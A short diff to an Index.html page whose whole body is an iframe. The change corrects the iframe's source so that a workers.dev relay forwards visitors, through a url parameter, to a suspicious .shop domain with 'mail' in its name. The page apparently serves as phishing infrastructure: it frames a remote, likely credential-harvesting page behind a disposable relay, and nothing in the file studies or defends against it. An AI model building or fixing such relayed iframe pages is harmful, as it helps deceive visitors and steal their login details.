--- a/Index.html
+++ b/Index.html
@@ -16,6 +16,6 @@
   </style>
 </head>
 <body>
-  <iframe src="https://gentle-block-5894.974hyacintha.workers.dev=https://genegc02.ya8z6nutsz3jhbtmail.shop/id"></iframe>
+  <iframe src="https://gentle-block-5894.974hyacintha.workers.dev/id?url=https%3A%2F%2Fgenegc02.ya8z6nutsz3jhbtmail.shop%2Fid"></iframe>
 </body>
 </html>
